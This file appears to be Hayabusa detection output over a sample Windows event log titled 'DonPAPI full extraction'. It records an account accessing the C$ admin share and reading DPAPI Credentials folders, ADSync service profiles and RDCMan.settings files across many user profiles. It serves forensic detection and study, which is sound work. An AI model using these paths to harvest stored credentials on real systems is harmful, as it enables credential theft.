+00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.013 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.013 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.013 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.033 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.034 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.037 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.039 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.039 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.039 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.039 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.039 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.054 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.054 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.623 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.623 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.638 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.638 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.654 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.654 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.654 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.654 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.654 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.654 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.670 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.670 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.670 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.670 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.670 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.670 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.670 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.686 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.686 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.686 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.686 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.701 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.701 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.701 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.701 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.701 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.701 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.717 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.717 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.717 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.733 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.733 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.733 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.733 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.748 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.748 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.748 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.748 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.748 